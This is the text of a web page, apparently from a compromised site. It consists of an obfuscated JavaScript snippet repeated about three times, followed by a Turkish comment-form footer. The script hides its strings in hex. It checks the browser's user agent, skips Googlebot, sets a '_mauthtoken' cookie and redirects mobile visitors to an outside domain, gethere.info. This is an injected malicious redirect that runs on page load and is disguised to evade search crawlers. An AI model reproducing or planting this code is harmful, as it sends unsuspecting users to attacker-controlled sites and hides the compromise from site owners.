os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here